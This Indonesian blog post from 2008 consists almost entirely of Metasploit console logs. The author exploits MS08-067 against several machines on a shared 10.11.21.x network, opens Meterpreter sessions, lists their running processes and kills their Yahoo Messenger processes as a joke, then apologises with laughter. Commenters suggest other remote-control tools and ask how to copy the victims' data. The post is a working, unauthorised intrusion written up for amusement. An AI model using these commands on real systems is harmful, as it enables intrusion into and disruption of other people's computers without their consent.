Wednesday, December 03, 2008

Lanjutan Exploit windows Universal

[*] Meterpreter session 11 closed.
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.186
RHOST => 10.11.21.186
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 12 opened (10.11.21.200:19393 -> 10.11.21.186:4444)

meterpreter > ps x

Process list
============

PID Name Path
--- ---- ----
256 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
492 i2050.exe C:\Program Files\Nortel\IP Softphone 2050\i2050.exe
504 avgamsvr.exe C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
548 avgupsvc.exe C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
580 avgemc.exe C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
636 i2050QosSvc.exe C:\Program Files\Nortel\IP Softphone 2050\i2050QosSvc.exe
700 smss.exe \SystemRoot\System32\smss.exe
736 MDM.EXE C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
748 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
776 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
820 services.exe C:\WINDOWS\system32\services.exe
832 lsass.exe C:\WINDOWS\system32\lsass.exe
1004 DF5Serv.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
1036 Ati2evxx.exe C:\WINDOWS\system32\Ati2evxx.exe
1052 svchost.exe C:\WINDOWS\system32\svchost.exe
1132 svchost.exe C:\WINDOWS\system32\svchost.exe
1228 svchost.exe C:\WINDOWS\System32\svchost.exe
1252 StarWindService.exe C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
1356 svchost.exe C:\WINDOWS\system32\svchost.exe
1404 svchost.exe C:\WINDOWS\system32\svchost.exe
1588 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1768 jucheck.exe C:\Program Files\Java\jre1.6.0_05\bin\jucheck.exe
1864 FrzState2k.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
1924 Explorer.EXE C:\WINDOWS\Explorer.EXE
2020 jusched.exe C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
2032 smax4pnp.exe C:\Program Files\Analog Devices\Core\smax4pnp.exe
2040 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
2352 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
2468 alg.exe C:\WINDOWS\System32\alg.exe
2548 notepad.exe C:\WINDOWS\system32\notepad.exe
2972 WINWORD.EXE C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
2980 YServer.exe C:\PROGRA~1\Yahoo!\MESSEN~1\YServer.exe
3024 cmd.exe C:\WINDOWS\system32\cmd.exe
3248 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
3500 NOTEPAD.EXE C:\WINDOWS\system32\NOTEPAD.EXE

meterpreter > kill 3248
Killing: 3248
meterpreter > exit

[*] Meterpreter session 12 closed.
msf exploit(ms08_067_netapi) > set RHOST 10.11.21.124
RHOST => 10.11.21.124
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 13 opened (10.11.21.200:23453 -> 10.11.21.124:4444)

meterpreter > ps -x

Process list
============

PID Name Path
--- ---- ----
204 Reader_sl.exe C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
208 smax4pnp.exe C:\Program Files\Analog Devices\Core\smax4pnp.exe
216 avgnt.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
240 SweetIM.exe C:\Program Files\SweetIM\Messenger\SweetIM.exe
248 SearchProtection.exe C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
260 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
284 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
368 sched.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
504 i2050QosSvc.exe C:\Program Files\Nortel\IP Softphone 2050\i2050QosSvc.exe
612 MDM.EXE C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
636 smss.exe \SystemRoot\System32\smss.exe
696 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
724 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
768 services.exe C:\WINDOWS\system32\services.exe
780 lsass.exe C:\WINDOWS\system32\lsass.exe
848 audevicemgr.exe C:\Program Files\Sony Ericsson\Mobile\audevicemgr.exe
948 DF5Serv.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
980 Ati2evxx.exe C:\WINDOWS\system32\Ati2evxx.exe
996 svchost.exe C:\WINDOWS\system32\svchost.exe
1048 MROUTE~2.EXE c:\PROGRA~1\INTUWA~1\Shared\MROUTE~1\MROUTE~2.EXE
1096 svchost.exe C:\WINDOWS\system32\svchost.exe
1192 svchost.exe C:\WINDOWS\System32\svchost.exe
1280 svchost.exe C:\WINDOWS\system32\svchost.exe
1324 wdfmgr.exe C:\WINDOWS\system32\wdfmgr.exe
1392 svchost.exe C:\WINDOWS\system32\svchost.exe
1424 WinVNC4.exe D:\titipan dwi\vnc\VNC4\WinVNC4.exe
1576 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1624 avguard.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
1784 CONNMN~1.EXE C:\PROGRA~1\SONYER~1\Mobile\CONNEC~1\CONNMN~1.EXE
1992 Explorer.EXE C:\WINDOWS\Explorer.EXE
2072 FrzState2k.exe C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
2344 alg.exe C:\WINDOWS\System32\alg.exe
2608 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
2692 YahooMessenger.exe C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe

meterpreter > kill 2692
Killing: 2692

wkakakakakakakaka lucu banget ............. deh ......... asli maap ... deh kakak

2 comments:

  1. pake damewarentutilities aja bro.. lebih asik.. asal tau pass jaringan nya ;)

    ReplyDelete
  2. bro kalo mau copy datanya ke komputer kita gimana yah ?

    tq

    ReplyDelete